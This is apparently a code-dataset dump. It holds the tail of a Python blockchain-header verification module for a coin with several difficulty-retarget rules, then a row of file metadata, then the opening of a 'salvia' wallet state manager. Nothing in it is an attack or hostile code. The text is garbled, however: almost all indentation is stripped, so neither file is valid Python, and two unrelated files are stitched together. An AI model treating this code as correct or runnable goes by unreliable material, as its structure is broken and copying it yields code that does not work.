blockchains = {}
def read_blockchains(config):
blockchains[0] = Blockchain(config, 0, None)
fdir = os.path.join(util.get_headers_dir(config), 'forks')
if not os.path.exists(fdir):
os.mkdir(fdir)
l = filter(lambda x: x.startswith('fork_'), os.listdir(fdir))
l = sorted(l, key = lambda x: int(x.split('_')[1]))
for filename in l:
checkpoint = int(filename.split('_')[2])
parent_id = int(filename.split('_')[1])
b = Blockchain(config, checkpoint, parent_id)
h = b.read_header(b.checkpoint)
if b.parent().can_connect(h, check_height=False):
blockchains[b.checkpoint] = b
else:
util.print_error("cannot connect", filename)
return blockchains
def check_header(header):
if type(header) is not dict:
return False
for b in blockchains.values():
if b.check_header(header):
return b
return False
def can_connect(header):
for b in blockchains.values():
if b.can_connect(header):
return b
return False
class Blockchain(util.PrintError):
"""
Manages blockchain headers and their verification
"""
def __init__(self, config, checkpoint, parent_id):
self.config = config
self.catch_up = None # interface catching up
self.checkpoint = checkpoint
self.checkpoints = constants.net.CHECKPOINTS
self.target_bridge = constants.read_json('target_bridge.json', None)
self.parent_id = parent_id
self.lock = threading.Lock()
with self.lock:
self.update_size()
def parent(self):
return blockchains[self.parent_id]
def get_max_child(self):
children = list(filter(lambda y: y.parent_id==self.checkpoint, blockchains.values()))
return max([x.checkpoint for x in children]) if children else None
def get_checkpoint(self):
mc = self.get_max_child()
return mc if mc is not None else self.checkpoint
def get_branch_size(self):
return self.height() - self.get_checkpoint() + 1
def get_name(self):
return self.get_hash(self.get_checkpoint()).lstrip('00')[0:10]
def check_header(self, header):
header_hash = hash_header(header)
height = header.get('block_height')
return header_hash == self.get_hash(height)
def fork(parent, header):
checkpoint = header.get('block_height')
self = Blockchain(parent.config, checkpoint, parent.checkpoint)
open(self.path(), 'w+').close()
self.save_header(header)
return self
def height(self):
return self.checkpoint + self.size() - 1
def size(self):
with self.lock:
return self._size
def update_size(self):
p = self.path()
self._size = os.path.getsize(p)//80 if os.path.exists(p) else 0
def verify_header(self, header, prev_hash, target):
_hash = pow_hash_header(header)
if prev_hash != header.get('prev_block_hash'):
raise Exception("prev hash mismatch: %s vs %s" % (prev_hash, header.get('prev_block_hash')))
if constants.net.TESTNET:
return
if header.get('block_height') >= len(self.checkpoints) * 2016:
bits = self.target_to_bits(target)
if bits != header.get('bits'):
raise Exception("bits mismatch: %s vs %s" % (bits, header.get('bits')))
if int('0x' + _hash, 16) > target:
raise Exception("insufficient proof of work: %s vs target %s" % (int('0x' + _hash, 16), target))
def verify_chunk(self, index, data):
num = len(data) // 80
prev_hash = self.get_hash(index * 2016 - 1)
headers = []
for i in range(num):
raw_header = data[i*80:(i+1) * 80]
headers.append(deserialize_header(raw_header, index*2016 + i))
for i, header in enumerate(headers):
target = self.get_target(index*2016 + i, headers)
self.verify_header(header, prev_hash, target)
prev_hash = hash_header(header)
def path(self):
d = util.get_headers_dir(self.config)
filename = 'blockchain_headers' if self.parent_id is None else os.path.join('forks', 'fork_%d_%d'%(self.parent_id, self.checkpoint))
return os.path.join(d, filename)
def save_chunk(self, index, chunk):
filename = self.path()
d = (index * 2016 - self.checkpoint) * 80
if d < 0:
chunk = chunk[-d:]
d = 0
truncate = index >= len(self.checkpoints)
self.write(chunk, d, truncate)
self.swap_with_parent()
def swap_with_parent(self):
if self.parent_id is None:
return
parent_branch_size = self.parent().height() - self.checkpoint + 1
if parent_branch_size >= self.size():
return
self.print_error("swap", self.checkpoint, self.parent_id)
parent_id = self.parent_id
checkpoint = self.checkpoint
parent = self.parent()
with open(self.path(), 'rb') as f:
my_data = f.read()
with open(parent.path(), 'rb') as f:
f.seek((checkpoint - parent.checkpoint)*80)
parent_data = f.read(parent_branch_size*80)
self.write(parent_data, 0)
parent.write(my_data, (checkpoint - parent.checkpoint)*80)
# store file path
for b in blockchains.values():
b.old_path = b.path()
# swap parameters
self.parent_id = parent.parent_id; parent.parent_id = parent_id
self.checkpoint = parent.checkpoint; parent.checkpoint = checkpoint
self._size = parent._size; parent._size = parent_branch_size
# move files
for b in blockchains.values():
if b in [self, parent]: continue
if b.old_path != b.path():
self.print_error("renaming", b.old_path, b.path())
os.rename(b.old_path, b.path())
# update pointers
blockchains[self.checkpoint] = self
blockchains[parent.checkpoint] = parent
def write(self, data, offset, truncate=True):
filename = self.path()
with self.lock:
with open(filename, 'rb+') as f:
if truncate and offset != self._size*80:
f.seek(offset)
f.truncate()
f.seek(offset)
f.write(data)
f.flush()
os.fsync(f.fileno())
self.update_size()
def save_header(self, header):
delta = header.get('block_height') - self.checkpoint
data = bfh(serialize_header(header))
assert delta == self.size()
assert len(data) == 80
self.write(data, delta*80)
self.swap_with_parent()
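    # Headers live in a flat file, 80 bytes each, at offset
    # (height - self.checkpoint) * 80. save_header therefore only ever appends
    # the next header (delta == size is asserted), while save_chunk writes a
    # whole 2016-header chunk at once.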
def read_header(self, height):
assert self.parent_id != self.checkpoint
if height < 0:
return
if height < self.checkpoint:
return self.parent().read_header(height)
if height > self.height():
return
delta = height - self.checkpoint
name = self.path()
if os.path.exists(name):
with open(name, 'rb') as f:
f.seek(delta * 80)
h = f.read(80)
if len(h) < 80:
raise Exception('Expected to read a full header. This was only {} bytes'.format(len(h)))
elif not os.path.exists(util.get_headers_dir(self.config)):
raise Exception('Electrum datadir does not exist. Was it deleted while running?')
else:
raise Exception('Cannot find headers file but datadir is there. Should be at {}'.format(name))
if h == bytes([0])*80:
return None
return deserialize_header(h, height)
def get_hash(self, height):
if height == -1:
return '0000000000000000000000000000000000000000000000000000000000000000'
elif height == 0:
return constants.net.GENESIS
elif height < len(self.checkpoints) * 2016:
assert (height+1) % 2016 == 0, height
index = height // 2016
return self.checkpoints[index]
else:
return hash_header(self.read_header(height))
def get_target(self, height, headers):
if constants.net.TESTNET:
return 0
if height == 0:
return MAX_TARGET
if height < len(self.checkpoints) * 2016:
# return pessimistic value to detect if check is unintentionally performed
return 0
bridge_index = height - len(self.checkpoints) * 2016
if bridge_index >= 0 and bridge_index < len(self.target_bridge):
            # Block headers below len(self.checkpoints) * 2016 are not fetched
            # by default. To bridge into on-the-fly target computation, the
            # target from the preceding headers must be known, so the required
            # target values are taken from local storage (target_bridge.json).
return self.target_bridge[bridge_index]
elif height == HEIGHT_FORK_FOUR:
return MAX_TARGET_NEOSCRYPT
elif height >= HEIGHT_FORK_THREE:
return self.__fork_three_target(height, headers)
elif height >= HEIGHT_FORK_TWO:
return self.__fork_two_target(height, headers)
elif height >= HEIGHT_FORK_ONE:
return self.__fork_one_target(height, headers)
else:
return self.__vanilla_target(height, headers)
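    # Retarget schedule as implemented above: Bitcoin-style 2016-block
    # retargets below height 33000 (__vanilla_target), a 504-block rule from
    # 33000 (__fork_one_target), a damped 126-block rule from 87948
    # (__fork_two_target), a per-block rule averaging 15/120/480-block windows
    # from 204639 (__fork_three_target), and a one-off reset to
    # MAX_TARGET_NEOSCRYPT exactly at height 432000.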
@staticmethod
def __damp(nActualTimespan, nTargetTimespan):
return int((nActualTimespan + 3 * nTargetTimespan) / 4)
def __fork_three_target(self, height, headers):
last_height = height - 1
last = self.get_header(last_height, height, headers)
target = self.bits_to_target(last.get('bits'))
first = self.get_header(last_height - 15, height, headers)
nActualTimespanShort = int((last.get('timestamp') - first.get('timestamp')) / 15)
first = self.get_header(last_height - 120, height, headers)
nActualTimespanMedium = int((last.get('timestamp') - first.get('timestamp')) / 120)
first = self.get_header(last_height - 480, height, headers)
nActualTimespanLong = int((last.get('timestamp') - first.get('timestamp')) / 480)
nActualTimespan = (nActualTimespanShort + nActualTimespanMedium + nActualTimespanLong) // 3
nTargetTimespan = 60
nActualTimespan = Blockchain.__damp(nActualTimespan, nTargetTimespan)
return Blockchain.__get_target(target, nActualTimespan, nTargetTimespan, 453, 494)
def __fork_two_target(self, height, headers):
interval = 126
last_height = height - 1
last = self.get_header(last_height, height, headers)
target = self.bits_to_target(last.get('bits'))
if height % interval != 0 and height != HEIGHT_FORK_TWO:
return target
first = self.get_header(last_height - interval, height, headers)
nActualTimespanShort = last.get('timestamp') - first.get('timestamp')
first = self.get_header(last_height - interval * 4, height, headers)
nActualTimespanLong = (last.get('timestamp') - first.get('timestamp')) // 4
nActualTimespan = (nActualTimespanShort + nActualTimespanLong) // 2
nTargetTimespan = SEVEN_DAYS // 32
nActualTimespan = Blockchain.__damp(nActualTimespan, nTargetTimespan)
return Blockchain.__get_target(target, nActualTimespan, nTargetTimespan, 453, 494)
def __fork_one_target(self, height, headers):
interval = 504
last_height = height - 1
last = self.get_header(last_height, height, headers)
target = self.bits_to_target(last.get('bits'))
if height % interval != 0 and height != HEIGHT_FORK_ONE:
return target
first = self.get_header(last_height - interval, height, headers)
nActualTimespan = last.get('timestamp') - first.get('timestamp')
return Blockchain.__get_target(target, nActualTimespan, SEVEN_DAYS // 8, 70, 99)
def __vanilla_target(self, height, headers):
interval = 2016
last_height = height - 1
last = self.get_header(last_height, height, headers)
bits = last.get('bits')
target = self.bits_to_target(bits)
if height % interval != 0:
return target
first = self.get_header(max(0, last_height - interval), height, headers)
nActualTimespan = last.get('timestamp') - first.get('timestamp')
return Blockchain.__get_target(target, nActualTimespan, SEVEN_DAYS // 2, 1, 4)
@staticmethod
def __get_target(target, nActualTimespan, nTargetTimespan, numerator, denominator):
nActualTimespan = max(nActualTimespan, int(nTargetTimespan * numerator / denominator))
nActualTimespan = min(nActualTimespan, int(nTargetTimespan * denominator / numerator))
new_target = min(MAX_TARGET, int(target * nActualTimespan / nTargetTimespan))
return new_target
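    # __get_target clamps nActualTimespan to
    # [nTargetTimespan * numerator / denominator, nTargetTimespan * denominator / numerator]
    # before rescaling the previous target. For the vanilla rule
    # (nTargetTimespan = SEVEN_DAYS // 2 = 302400 s, bounds 1/4x..4x) a chunk
    # mined twice as fast roughly halves the target, i.e. doubles difficulty.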
def get_header(self, height, ref_height, headers):
delta = ref_height % 2016
if height < ref_height - delta or headers is None:
return self.read_header(height)
return headers[delta - (ref_height - height)]
def bits_to_target(self, bits):
bitsN = (bits >> 24) & 0xff
if not (bitsN >= 0x03 and bitsN <= 0x1e):
raise Exception("First part of bits should be in [0x03, 0x1e]")
bitsBase = bits & 0xffffff
if not (bitsBase >= 0x8000 and bitsBase <= 0x7fffff):
raise Exception("Second part of bits should be in [0x8000, 0x7fffff]")
return bitsBase << (8 * (bitsN-3))
def target_to_bits(self, target):
c = ("%064x" % target)[2:]
while c[:2] == '00' and len(c) > 6:
c = c[2:]
bitsN, bitsBase = len(c) // 2, int('0x' + c[:6], 16)
if bitsBase >= 0x800000:
bitsN += 1
bitsBase >>= 8
return bitsN << 24 | bitsBase
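    # Worked example of the compact "bits" encoding implemented above:
    #   target_to_bits(MAX_TARGET) == 0x1e0fffff
    #   bits_to_target(0x1e0fffff) == 0x0fffff << (8 * (0x1e - 3))
    # Only a 3-byte mantissa is kept, so target -> bits -> target truncates the
    # low-order bytes of the original target.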
def can_connect(self, header, check_height=True):
if header is None:
return False
height = header['block_height']
if check_height and self.height() != height - 1:
#self.print_error("cannot connect at height", height)
return False
if height == 0:
return hash_header(header) == constants.net.GENESIS
try:
prev_hash = self.get_hash(height - 1)
except:
return False
if prev_hash != header.get('prev_block_hash'):
return False
target = self.get_target(height, None)
try:
self.verify_header(header, prev_hash, target)
except BaseException as e:
return False
return True
def connect_chunk(self, idx, hexdata):
try:
data = bfh(hexdata)
self.verify_chunk(idx, data)
#self.print_error("validated chunk %d" % idx)
self.save_chunk(idx, data)
return True
except BaseException as e:
self.print_error('verify_chunk %d failed'%idx, str(e))
return False
def get_checkpoints(self):
        # for each chunk, store the hash of its last block
n = self.height() // 2016
return [self.get_hash((i+1) * 2016 -1) for i in range(n)]
| 40.180828 | 140 | 0.626091 |
4cf50e7ee87edb0a771dd0ba8b4947406c912d59
| 54,440 |
py
|
Python
|
salvia/wallet/wallet_state_manager.py
|
mikando/salvia-blockchain
|
02181d0b5a063374f01eea951570dbc661bddc34
|
[
"Apache-2.0"
] | null | null | null |
salvia/wallet/wallet_state_manager.py
|
mikando/salvia-blockchain
|
02181d0b5a063374f01eea951570dbc661bddc34
|
[
"Apache-2.0"
] | null | null | null |
salvia/wallet/wallet_state_manager.py
|
mikando/salvia-blockchain
|
02181d0b5a063374f01eea951570dbc661bddc34
|
[
"Apache-2.0"
] | null | null | null |
import asyncio
import base64
import json
import logging
import time
from collections import defaultdict
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Set, Tuple
import aiosqlite
from blspy import AugSchemeMPL, G1Element, PrivateKey
from chiabip158 import PyBIP158
from cryptography.fernet import Fernet
from salvia import __version__
from salvia.consensus.block_record import BlockRecord
from salvia.consensus.coinbase import pool_parent_id, farmer_parent_id
from salvia.consensus.constants import ConsensusConstants
from salvia.consensus.find_fork_point import find_fork_point_in_chain
from salvia.full_node.weight_proof import WeightProofHandler
from salvia.pools.pool_puzzles import SINGLETON_LAUNCHER_HASH, solution_to_pool_state
from salvia.pools.pool_wallet import PoolWallet
from salvia.protocols.wallet_protocol import PuzzleSolutionResponse, RespondPuzzleSolution
from salvia.types.blockchain_format.coin import Coin
from salvia.types.blockchain_format.program import Program
from salvia.types.blockchain_format.sized_bytes import bytes32
from salvia.types.coin_spend import CoinSpend
from salvia.types.full_block import FullBlock
from salvia.types.header_block import HeaderBlock
from salvia.types.mempool_inclusion_status import MempoolInclusionStatus
from salvia.util.byte_types import hexstr_to_bytes
from salvia.util.db_wrapper import DBWrapper
from salvia.util.errors import Err
from salvia.util.hash import std_hash
from salvia.util.ints import uint32, uint64, uint128
from salvia.util.db_synchronous import db_synchronous_on
from salvia.wallet.block_record import HeaderBlockRecord
from salvia.wallet.cc_wallet.cc_wallet import CCWallet
from salvia.wallet.derivation_record import DerivationRecord
from salvia.wallet.derive_keys import master_sk_to_backup_sk, master_sk_to_wallet_sk
from salvia.wallet.key_val_store import KeyValStore
from salvia.wallet.rl_wallet.rl_wallet import RLWallet
from salvia.wallet.settings.user_settings import UserSettings
from salvia.wallet.trade_manager import TradeManager
from salvia.wallet.transaction_record import TransactionRecord
from salvia.wallet.util.backup_utils import open_backup_file
from salvia.wallet.util.transaction_type import TransactionType
from salvia.wallet.util.wallet_types import WalletType
from salvia.wallet.wallet import Wallet
from salvia.wallet.wallet_action import WalletAction
from salvia.wallet.wallet_action_store import WalletActionStore
from salvia.wallet.wallet_block_store import WalletBlockStore
from salvia.wallet.wallet_blockchain import WalletBlockchain
from salvia.wallet.wallet_coin_record import WalletCoinRecord
from salvia.wallet.wallet_coin_store import WalletCoinStore
from salvia.wallet.wallet_info import WalletInfo, WalletInfoBackup
from salvia.wallet.wallet_interested_store import WalletInterestedStore
from salvia.wallet.wallet_pool_store import WalletPoolStore
from salvia.wallet.wallet_puzzle_store import WalletPuzzleStore
from salvia.wallet.wallet_sync_store import WalletSyncStore
from salvia.wallet.wallet_transaction_store import WalletTransactionStore
from salvia.wallet.wallet_user_store import WalletUserStore
from salvia.server.server import SalviaServer
from salvia.wallet.did_wallet.did_wallet import DIDWallet
def get_balance_from_coin_records(coin_records: Set[WalletCoinRecord]) -> uint128:
amount: uint128 = uint128(0)
for record in coin_records:
amount = uint128(amount + record.coin.amount)
return uint128(amount)
class WalletStateManager:
constants: ConsensusConstants
config: Dict
tx_store: WalletTransactionStore
puzzle_store: WalletPuzzleStore
user_store: WalletUserStore
action_store: WalletActionStore
basic_store: KeyValStore
start_index: int
# Makes sure only one asyncio thread is changing the blockchain state at one time
lock: asyncio.Lock
tx_lock: asyncio.Lock
log: logging.Logger
# TODO Don't allow user to send tx until wallet is synced
sync_mode: bool
genesis: FullBlock
state_changed_callback: Optional[Callable]
pending_tx_callback: Optional[Callable]
puzzle_hash_created_callbacks: Dict = defaultdict(lambda *x: None)
new_peak_callbacks: Dict = defaultdict(lambda *x: None)
db_path: Path
db_connection: aiosqlite.Connection
db_wrapper: DBWrapper
main_wallet: Wallet
wallets: Dict[uint32, Any]
private_key: PrivateKey
trade_manager: TradeManager
new_wallet: bool
user_settings: UserSettings
blockchain: Any
block_store: WalletBlockStore
coin_store: WalletCoinStore
sync_store: WalletSyncStore
interested_store: WalletInterestedStore
pool_store: WalletPoolStore
weight_proof_handler: Any
server: SalviaServer
root_path: Path
@staticmethod
async def create(
private_key: PrivateKey,
config: Dict,
db_path: Path,
constants: ConsensusConstants,
server: SalviaServer,
root_path: Path,
name: str = None,
):
self = WalletStateManager()
self.new_wallet = False
self.config = config
self.constants = constants
self.server = server
self.root_path = root_path
self.log = logging.getLogger(name if name else __name__)
self.lock = asyncio.Lock()
self.log.debug(f"Starting in db path: {db_path}")
self.db_connection = await aiosqlite.connect(db_path)
await self.db_connection.execute("pragma journal_mode=wal")
await self.db_connection.execute(
"pragma synchronous={}".format(db_synchronous_on(self.config.get("db_sync", "auto"), db_path))
)
self.db_wrapper = DBWrapper(self.db_connection)
self.coin_store = await WalletCoinStore.create(self.db_wrapper)
self.tx_store = await WalletTransactionStore.create(self.db_wrapper)
self.puzzle_store = await WalletPuzzleStore.create(self.db_wrapper)
self.user_store = await WalletUserStore.create(self.db_wrapper)
self.action_store = await WalletActionStore.create(self.db_wrapper)
self.basic_store = await KeyValStore.create(self.db_wrapper)
self.trade_manager = await TradeManager.create(self, self.db_wrapper)
self.user_settings = await UserSettings.create(self.basic_store)
self.block_store = await WalletBlockStore.create(self.db_wrapper)
self.interested_store = await WalletInterestedStore.create(self.db_wrapper)
self.pool_store = await WalletPoolStore.create(self.db_wrapper)
self.blockchain = await WalletBlockchain.create(
self.block_store,
self.coin_store,
self.tx_store,
self.pool_store,
self.constants,
self.new_transaction_block_callback,
self.reorg_rollback,
self.lock,
)
self.weight_proof_handler = WeightProofHandler(self.constants, self.blockchain)
self.sync_mode = False
self.sync_store = await WalletSyncStore.create()
self.state_changed_callback = None
self.pending_tx_callback = None
self.db_path = db_path
main_wallet_info = await self.user_store.get_wallet_by_id(1)
assert main_wallet_info is not None
self.private_key = private_key
self.main_wallet = await Wallet.create(self, main_wallet_info)
self.wallets = {main_wallet_info.id: self.main_wallet}
wallet = None
for wallet_info in await self.get_all_wallet_info_entries():
if wallet_info.type == WalletType.STANDARD_WALLET:
if wallet_info.id == 1:
continue
wallet = await Wallet.create(config, wallet_info)
elif wallet_info.type == WalletType.COLOURED_COIN:
wallet = await CCWallet.create(
self,
self.main_wallet,
wallet_info,
)
elif wallet_info.type == WalletType.RATE_LIMITED:
wallet = await RLWallet.create(self, wallet_info)
elif wallet_info.type == WalletType.DISTRIBUTED_ID:
wallet = await DIDWallet.create(
self,
self.main_wallet,
wallet_info,
)
elif wallet_info.type == WalletType.POOLING_WALLET:
wallet = await PoolWallet.create_from_db(
self,
self.main_wallet,
wallet_info,
)
if wallet is not None:
self.wallets[wallet_info.id] = wallet
async with self.puzzle_store.lock:
index = await self.puzzle_store.get_last_derivation_path()
if index is None or index < self.config["initial_num_public_keys"] - 1:
await self.create_more_puzzle_hashes(from_zero=True)
return self
@property
def peak(self) -> Optional[BlockRecord]:
peak = self.blockchain.get_peak()
return peak
def get_derivation_index(self, pubkey: G1Element, max_depth: int = 1000) -> int:
for i in range(0, max_depth):
derived = self.get_public_key(uint32(i))
if derived == pubkey:
return i
return -1
def get_public_key(self, index: uint32) -> G1Element:
return master_sk_to_wallet_sk(self.private_key, index).get_g1()
async def load_wallets(self):
for wallet_info in await self.get_all_wallet_info_entries():
if wallet_info.id in self.wallets:
continue
if wallet_info.type == WalletType.STANDARD_WALLET:
if wallet_info.id == 1:
continue
wallet = await Wallet.create(self.config, wallet_info)
self.wallets[wallet_info.id] = wallet
# TODO add RL AND DiD WALLETS HERE
elif wallet_info.type == WalletType.COLOURED_COIN:
wallet = await CCWallet.create(
self,
self.main_wallet,
wallet_info,
)
self.wallets[wallet_info.id] = wallet
elif wallet_info.type == WalletType.DISTRIBUTED_ID:
wallet = await DIDWallet.create(
self,
self.main_wallet,
wallet_info,
)
self.wallets[wallet_info.id] = wallet
async def get_keys(self, puzzle_hash: bytes32) -> Optional[Tuple[G1Element, PrivateKey]]:
index_for_puzzlehash = await self.puzzle_store.index_for_puzzle_hash(puzzle_hash)
if index_for_puzzlehash is None:
raise ValueError(f"No key for this puzzlehash {puzzle_hash})")
private = master_sk_to_wallet_sk(self.private_key, index_for_puzzlehash)
pubkey = private.get_g1()
return pubkey, private
async def create_more_puzzle_hashes(self, from_zero: bool = False, in_transaction=False):
"""
For all wallets in the user store, generates the first few puzzle hashes so
that we can restore the wallet from only the private keys.
"""
targets = list(self.wallets.keys())
unused: Optional[uint32] = await self.puzzle_store.get_unused_derivation_path()
if unused is None:
# This handles the case where the database has entries but they have all been used
unused = await self.puzzle_store.get_last_derivation_path()
if unused is None:
# This handles the case where the database is empty
unused = uint32(0)
if self.new_wallet:
to_generate = self.config["initial_num_public_keys_new_wallet"]
else:
to_generate = self.config["initial_num_public_keys"]
for wallet_id in targets:
target_wallet = self.wallets[wallet_id]
last: Optional[uint32] = await self.puzzle_store.get_last_derivation_path_for_wallet(wallet_id)
start_index = 0
derivation_paths: List[DerivationRecord] = []
if last is not None:
start_index = last + 1
# If the key was replaced (from_zero=True), we should generate the puzzle hashes for the new key
if from_zero:
start_index = 0
for index in range(start_index, unused + to_generate):
if WalletType(target_wallet.type()) == WalletType.POOLING_WALLET:
continue
if WalletType(target_wallet.type()) == WalletType.RATE_LIMITED:
if target_wallet.rl_info.initialized is False:
break
wallet_type = target_wallet.rl_info.type
if wallet_type == "user":
rl_pubkey = G1Element.from_bytes(target_wallet.rl_info.user_pubkey)
else:
rl_pubkey = G1Element.from_bytes(target_wallet.rl_info.admin_pubkey)
rl_puzzle: Program = target_wallet.puzzle_for_pk(rl_pubkey)
puzzle_hash: bytes32 = rl_puzzle.get_tree_hash()
rl_index = self.get_derivation_index(rl_pubkey)
if rl_index == -1:
break
derivation_paths.append(
DerivationRecord(
uint32(rl_index),
puzzle_hash,
rl_pubkey,
target_wallet.type(),
uint32(target_wallet.id()),
)
)
break
pubkey: G1Element = self.get_public_key(uint32(index))
puzzle: Program = target_wallet.puzzle_for_pk(bytes(pubkey))
if puzzle is None:
self.log.warning(f"Unable to create puzzles with wallet {target_wallet}")
break
puzzlehash: bytes32 = puzzle.get_tree_hash()
self.log.info(f"Puzzle at index {index} wallet ID {wallet_id} puzzle hash {puzzlehash.hex()}")
derivation_paths.append(
DerivationRecord(
uint32(index),
puzzlehash,
pubkey,
target_wallet.type(),
uint32(target_wallet.id()),
)
)
await self.puzzle_store.add_derivation_paths(derivation_paths, in_transaction)
if unused > 0:
await self.puzzle_store.set_used_up_to(uint32(unused - 1), in_transaction)
async def update_wallet_puzzle_hashes(self, wallet_id):
derivation_paths: List[DerivationRecord] = []
target_wallet = self.wallets[wallet_id]
last: Optional[uint32] = await self.puzzle_store.get_last_derivation_path_for_wallet(wallet_id)
unused: Optional[uint32] = await self.puzzle_store.get_unused_derivation_path()
if unused is None:
# This handles the case where the database has entries but they have all been used
unused = await self.puzzle_store.get_last_derivation_path()
if unused is None:
# This handles the case where the database is empty
unused = uint32(0)
for index in range(unused, last):
pubkey: G1Element = self.get_public_key(uint32(index))
puzzle: Program = target_wallet.puzzle_for_pk(bytes(pubkey))
puzzlehash: bytes32 = puzzle.get_tree_hash()
self.log.info(f"Generating public key at index {index} puzzle hash {puzzlehash.hex()}")
derivation_paths.append(
DerivationRecord(
uint32(index),
puzzlehash,
pubkey,
target_wallet.wallet_info.type,
uint32(target_wallet.wallet_info.id),
)
)
await self.puzzle_store.add_derivation_paths(derivation_paths)
async def get_unused_derivation_record(self, wallet_id: uint32, in_transaction=False) -> DerivationRecord:
"""
Creates a puzzle hash for the given wallet, and then makes more puzzle hashes
        for every wallet to ensure we always have more in the database. Never reuse the
same public key more than once (for privacy).
"""
async with self.puzzle_store.lock:
# If we have no unused public keys, we will create new ones
unused: Optional[uint32] = await self.puzzle_store.get_unused_derivation_path()
if unused is None:
await self.create_more_puzzle_hashes()
# Now we must have unused public keys
unused = await self.puzzle_store.get_unused_derivation_path()
assert unused is not None
record: Optional[DerivationRecord] = await self.puzzle_store.get_derivation_record(unused, wallet_id)
assert record is not None
# Set this key to used so we never use it again
await self.puzzle_store.set_used_up_to(record.index, in_transaction=in_transaction)
# Create more puzzle hashes / keys
await self.create_more_puzzle_hashes(in_transaction=in_transaction)
return record
async def get_current_derivation_record_for_wallet(self, wallet_id: uint32) -> Optional[DerivationRecord]:
async with self.puzzle_store.lock:
# If we have no unused public keys, we will create new ones
current: Optional[DerivationRecord] = await self.puzzle_store.get_current_derivation_record_for_wallet(
wallet_id
)
return current
def set_callback(self, callback: Callable):
"""
Callback to be called when the state of the wallet changes.
"""
self.state_changed_callback = callback
def set_pending_callback(self, callback: Callable):
"""
        Callback to be called when a new pending transaction enters the store
"""
self.pending_tx_callback = callback
def set_coin_with_puzzlehash_created_callback(self, puzzlehash: bytes32, callback: Callable):
"""
        Callback to be called when a new coin is seen with the specified puzzlehash
"""
self.puzzle_hash_created_callbacks[puzzlehash] = callback
def set_new_peak_callback(self, wallet_id: int, callback: Callable):
"""
        Callback to be called when the blockchain adds a new peak
"""
self.new_peak_callbacks[wallet_id] = callback
async def puzzle_hash_created(self, coin: Coin):
callback = self.puzzle_hash_created_callbacks[coin.puzzle_hash]
if callback is None:
return None
await callback(coin)
def state_changed(self, state: str, wallet_id: int = None, data_object=None):
"""
Calls the callback if it's present.
"""
if data_object is None:
data_object = {}
if self.state_changed_callback is None:
return None
self.state_changed_callback(state, wallet_id, data_object)
def tx_pending_changed(self) -> None:
"""
Notifies the wallet node that there's new tx pending
"""
if self.pending_tx_callback is None:
return None
self.pending_tx_callback()
async def synced(self):
if self.sync_mode is True:
return False
peak: Optional[BlockRecord] = self.blockchain.get_peak()
if peak is None:
return False
curr = peak
while not curr.is_transaction_block and not curr.height == 0:
curr = self.blockchain.try_block_record(curr.prev_hash)
if curr is None:
return False
if curr.is_transaction_block and curr.timestamp > int(time.time()) - 7 * 60:
return True
return False
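    # synced() heuristic: not currently syncing, and the most recent
    # transaction block reachable from the peak carries a timestamp within the
    # last 7 minutes of local time.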
def set_sync_mode(self, mode: bool):
"""
Sets the sync mode. This changes the behavior of the wallet node.
"""
self.sync_mode = mode
self.state_changed("sync_changed")
async def get_confirmed_spendable_balance_for_wallet(self, wallet_id: int, unspent_records=None) -> uint128:
"""
Returns the balance amount of all coins that are spendable.
"""
spendable: Set[WalletCoinRecord] = await self.get_spendable_coins_for_wallet(wallet_id, unspent_records)
spendable_amount: uint128 = uint128(0)
for record in spendable:
spendable_amount = uint128(spendable_amount + record.coin.amount)
return spendable_amount
async def does_coin_belong_to_wallet(self, coin: Coin, wallet_id: int) -> bool:
"""
        Returns true if this coin's puzzle hash belongs to the given wallet.
"""
info = await self.puzzle_store.wallet_info_for_puzzle_hash(coin.puzzle_hash)
if info is None:
return False
coin_wallet_id, wallet_type = info
if wallet_id == coin_wallet_id:
return True
return False
async def get_confirmed_balance_for_wallet_already_locked(self, wallet_id: int) -> uint128:
        # This is a workaround to be able to call a locking operation when already locked
# for example, in the create method of DID wallet
if self.lock.locked() is False:
raise AssertionError("expected wallet_state_manager to be locked")
unspent_coin_records = await self.coin_store.get_unspent_coins_for_wallet(wallet_id)
return get_balance_from_coin_records(unspent_coin_records)
async def get_confirmed_balance_for_wallet(
self,
wallet_id: int,
unspent_coin_records: Optional[Set[WalletCoinRecord]] = None,
) -> uint128:
"""
Returns the confirmed balance, including coinbase rewards that are not spendable.
"""
# lock only if unspent_coin_records is None.
# This API should change so that get_balance_from_coin_records is called for Set[WalletCoinRecord]
# and this method is called only for the unspent_coin_records==None case.
if unspent_coin_records is None:
unspent_coin_records = await self.get_confirmed_balance_for_wallet_with_lock(wallet_id)
return get_balance_from_coin_records(unspent_coin_records)
async def get_confirmed_balance_for_wallet_with_lock(self, wallet_id: int) -> Set[WalletCoinRecord]:
if self.lock.locked() is True:
# raise AssertionError("expected wallet_state_manager to be unlocked")
pass
async with self.lock:
return await self.coin_store.get_unspent_coins_for_wallet(wallet_id)
async def get_unconfirmed_balance(
self, wallet_id, unspent_coin_records: Optional[Set[WalletCoinRecord]] = None
) -> uint128:
"""
Returns the balance, including coinbase rewards that are not spendable, and unconfirmed
transactions.
"""
# This API should change so that get_balance_from_coin_records is called for Set[WalletCoinRecord]
# and this method is called only for the unspent_coin_records==None case.
confirmed_amount = await self.get_confirmed_balance_for_wallet(wallet_id, unspent_coin_records)
return await self._get_unconfirmed_balance(wallet_id, confirmed_amount)
async def get_unconfirmed_balance_already_locked(self, wallet_id) -> uint128:
confirmed_amount = await self.get_confirmed_balance_for_wallet_already_locked(wallet_id)
return await self._get_unconfirmed_balance(wallet_id, confirmed_amount)
async def _get_unconfirmed_balance(self, wallet_id, confirmed: uint128) -> uint128:
unconfirmed_tx: List[TransactionRecord] = await self.tx_store.get_unconfirmed_for_wallet(wallet_id)
removal_amount: int = 0
addition_amount: int = 0
for record in unconfirmed_tx:
for removal in record.removals:
if await self.does_coin_belong_to_wallet(removal, wallet_id):
removal_amount += removal.amount
for addition in record.additions:
# This change or a self transaction
if await self.does_coin_belong_to_wallet(addition, wallet_id):
addition_amount += addition.amount
result = (confirmed + addition_amount) - removal_amount
return uint128(result)
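    # In other words: unconfirmed balance = confirmed balance
    #                                     + pending additions to this wallet
    #                                     - pending removals from this wallet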
async def unconfirmed_additions_for_wallet(self, wallet_id: int) -> Dict[bytes32, Coin]:
"""
Returns change coins for the wallet_id.
        (Additions from transactions that have not been confirmed yet.)
"""
additions: Dict[bytes32, Coin] = {}
unconfirmed_tx = await self.tx_store.get_unconfirmed_for_wallet(wallet_id)
for record in unconfirmed_tx:
for coin in record.additions:
if await self.is_addition_relevant(coin):
additions[coin.name()] = coin
return additions
